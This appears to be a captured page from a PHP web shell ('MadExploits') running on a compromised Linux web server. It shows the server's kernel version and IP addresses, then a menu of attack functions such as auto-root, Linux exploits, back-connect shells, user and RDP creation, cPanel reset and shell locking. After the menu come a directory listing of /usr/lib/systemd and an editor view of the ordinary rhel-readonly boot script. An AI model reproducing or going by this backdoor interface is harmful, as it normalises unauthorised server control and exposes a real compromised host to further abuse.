Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.118.149.55
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
import-pubring.gpg
9.33
KB
-rw-r--r--
rhel-autorelabel
2.31
KB
-rwxr-xr-x
rhel-configure
399
B
-rwxr-xr-x
rhel-dmesg
110
B
-rwxr-xr-x
rhel-domainname
158
B
-rwxr-xr-x
rhel-import-state
1.03
KB
-rwxr-xr-x
rhel-loadmodules
233
B
-rwxr-xr-x
rhel-readonly
5.77
KB
-rwxr-xr-x
systemd
1.56
MB
-rwxr-xr-x
systemd-ac-power
23.41
KB
-rwxr-xr-x
systemd-activate
68.52
KB
-rwxr-xr-x
systemd-backlight
73.02
KB
-rwxr-xr-x
systemd-binfmt
60.73
KB
-rwxr-xr-x
systemd-bootchart
125.05
KB
-rwxr-xr-x
systemd-cgroups-agent
35.91
KB
-rwxr-xr-x
systemd-coredump
129.86
KB
-rwxr-xr-x
systemd-cryptsetup
101.28
KB
-rwxr-xr-x
systemd-fsck
331.23
KB
-rwxr-xr-x
systemd-hibernate-resume
39.95
KB
-rwxr-xr-x
systemd-hostnamed
367.16
KB
-rwxr-xr-x
systemd-importd
367.75
KB
-rwxr-xr-x
systemd-initctl
309.84
KB
-rwxr-xr-x
systemd-journald
338.05
KB
-rwxr-xr-x
systemd-localed
375.22
KB
-rwxr-xr-x
systemd-logind
624.84
KB
-rwxr-xr-x
systemd-machine-id-commit
52.19
KB
-rwxr-xr-x
systemd-machined
482.01
KB
-rwxr-xr-x
systemd-modules-load
64.8
KB
-rwxr-xr-x
systemd-pull
183.14
KB
-rwxr-xr-x
systemd-quotacheck
43.96
KB
-rwxr-xr-x
systemd-random-seed
48.13
KB
-rwxr-xr-x
systemd-readahead
97.51
KB
-rwxr-xr-x
systemd-remount-fs
56.52
KB
-rwxr-xr-x
systemd-reply-password
35.93
KB
-rwxr-xr-x
systemd-rfkill
60.74
KB
-rwxr-xr-x
systemd-shutdown
146.76
KB
-rwxr-xr-x
systemd-shutdownd
64.52
KB
-rwxr-xr-x
systemd-sleep
89.16
KB
-rwxr-xr-x
systemd-socket-proxyd
105.52
KB
-rwxr-xr-x
systemd-sysctl
64.83
KB
-rwxr-xr-x
systemd-sysv-install
40.22
KB
-rwxr-xr-x
systemd-timedated
375.91
KB
-rwxr-xr-x
systemd-udevd
406.45
KB
-rwxr-xr-x
systemd-update-done
44.07
KB
-rwxr-xr-x
systemd-update-utmp
309.87
KB
-rwxr-xr-x
systemd-user-sessions
44.16
KB
-rwxr-xr-x
systemd-vconsole-setup
52.2
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rhel-readonly
#!/bin/bash # # Set up readonly-root support. # . /etc/init.d/functions # We need to initialize the $HOSTNAME variable by ourselves now: # (It was previously done for RHEL-6 branch, but got lost in time.) HOSTNAME="$(hostname)" # Check SELinux status SELINUX_STATE= if [ -e "/sys/fs/selinux/enforce" ] && [ "$(cat /proc/self/attr/current)" != "kernel" ]; then if [ -r "/sys/fs/selinux/enforce" ] ; then SELINUX_STATE=$(cat "/sys/fs/selinux/enforce") else # assume enforcing if you can't read it SELINUX_STATE=1 fi fi selinux_fixup() { if [ -n "$SELINUX_STATE" ] && [ -e "$1" ]; then restorecon -R "$1" fi } # Only read this once. [ -z "${cmdline}" ] && cmdline=$(cat /proc/cmdline) READONLY= if [ -f /etc/sysconfig/readonly-root ]; then . /etc/sysconfig/readonly-root fi if strstr "$cmdline" readonlyroot ; then READONLY=yes [ -z "$RW_MOUNT" ] && RW_MOUNT=/var/lib/stateless/writable [ -z "$STATE_MOUNT" ] && STATE_MOUNT=/var/lib/stateless/state fi if strstr "$cmdline" noreadonlyroot ; then READONLY=no fi MOUNTS=() if [ "$READONLY" = "yes" -o "$TEMPORARY_STATE" = "yes" ]; then add_mount() { mnt=${1%/} MOUNTS=("${MOUNTS[@]}" "$mnt") } cp_empty() { if [ -e "$1" ]; then echo "$1" | cpio -p -vd "$RW_MOUNT" &>/dev/null add_mount $1 fi } cp_dirs() { if [ -e "$1" ]; then mkdir -p "$RW_MOUNT$1" find "$1" -type d -print0 | cpio -p -0vd "$RW_MOUNT" &>/dev/null add_mount $1 fi } cp_files() { if [ -e "$1" ]; then cp -a --parents "$1" "$RW_MOUNT" add_mount $1 fi } # Common mount options for scratch space regardless of # type of backing store mountopts= # Scan partitions for local scratch storage rw_mount_dev=$(blkid -t LABEL="$RW_LABEL" -l -o device) bindmountopts= [ "$SLAVE_MOUNTS" = "yes" ] && bindmountopts="--make-slave" # First try to mount scratch storage from /etc/fstab, then any # partition with the proper label. If either succeeds, be sure # to wipe the scratch storage clean. If both fail, then mount # scratch storage via tmpfs. if mount $mountopts "$RW_MOUNT" > /dev/null 2>&1 ; then rm -rf "$RW_MOUNT" > /dev/null 2>&1 elif [ x$rw_mount_dev != x ] && mount $rw_mount_dev $mountopts "$RW_MOUNT" > /dev/null 2>&1; then rm -rf "$RW_MOUNT" > /dev/null 2>&1 else mount -n -t tmpfs $RW_OPTIONS $mountopts none "$RW_MOUNT" fi for file in /etc/rwtab /etc/rwtab.d/* /run/initramfs/rwtab ; do is_ignored_file "$file" && continue [ -f $file ] && while read type path ; do case "$type" in empty) cp_empty $path ;; files) cp_files $path ;; dirs) cp_dirs $path ;; *) ;; esac done < <(cat $file) done for m in "${MOUNTS[@]}"; do prefix=0 for mount_point in "${MOUNTS[@]}"; do [[ $m = $mount_point ]] && continue if [[ $m =~ ^$mount_point/.* ]] ; then prefix=1 break fi done [[ $prefix -eq 1 ]] && continue mount -n --bind $bindmountopts "$RW_MOUNT$m" "$m" selinux_fixup "$m" done # Use any state passed by initramfs [ -d /run/initramfs/state ] && cp -a /run/initramfs/state/* $RW_MOUNT # In theory there should be no more than one network interface active # this early in the boot process -- the one we're booting from. # Use the network address to set the hostname of the client. This # must be done even if we have local storage. ipaddr= if [ "$HOSTNAME" = "localhost" -o "$HOSTNAME" = "localhost.localdomain" ]; then ipaddr=$(ip addr show to 0.0.0.0/0 scope global | awk '/[[:space:]]inet / { print gensub("/.*","","g",$2) }') for ip in $ipaddr ; do HOSTNAME= eval $(ipcalc -h $ipaddr 2>/dev/null) [ -n "$HOSTNAME" ] && { hostname ${HOSTNAME} ; break; } done fi # Clients with read-only root filesystems may be provided with a # place where they can place minimal amounts of persistent # state. SSH keys or puppet certificates for example. # # Ideally we'll use puppet to manage the state directory and to # create the bind mounts. However, until that's all ready this # is sufficient to build a working system. # First try to mount persistent data from /etc/fstab, then any # partition with the proper label, then fallback to NFS state_mount_dev=$(blkid -t LABEL="$STATE_LABEL" -l -o device) if mount $mountopts $STATE_OPTIONS "$STATE_MOUNT" > /dev/null 2>&1 ; then /bin/true elif [ x$state_mount_dev != x ] && mount $state_mount_dev $mountopts "$STATE_MOUNT" > /dev/null 2>&1; then /bin/true elif [ ! -z "$CLIENTSTATE" ]; then # No local storage was found. Make a final attempt to find # state on an NFS server. mount -t nfs $CLIENTSTATE/$HOSTNAME $STATE_MOUNT -o rw,nolock fi if [ -w "$STATE_MOUNT" ]; then mount_state() { if [ -e "$1" ]; then [ ! -e "$STATE_MOUNT$1" ] && cp -a --parents "$1" "$STATE_MOUNT" mount -n --bind $bindmountopts "$STATE_MOUNT$1" "$1" fi } for file in /etc/statetab /etc/statetab.d/* ; do is_ignored_file "$file" && continue [ ! -f "$file" ] && continue if [ -f "$STATE_MOUNT/$file" ] ; then mount -n --bind $bindmountopts "$STATE_MOUNT/$file" "$file" fi for path in $(grep -v "^#" "$file" 2>/dev/null); do mount_state "$path" selinux_fixup "$path" done done if [ -f "$STATE_MOUNT/files" ] ; then for path in $(grep -v "^#" "$STATE_MOUNT/files" 2>/dev/null); do mount_state "$path" selinux_fixup "$path" done fi fi if mount | grep -q /var/lib/nfs/rpc_pipefs ; then mount -t rpc_pipefs sunrpc /var/lib/nfs/rpc_pipefs fi fi
Close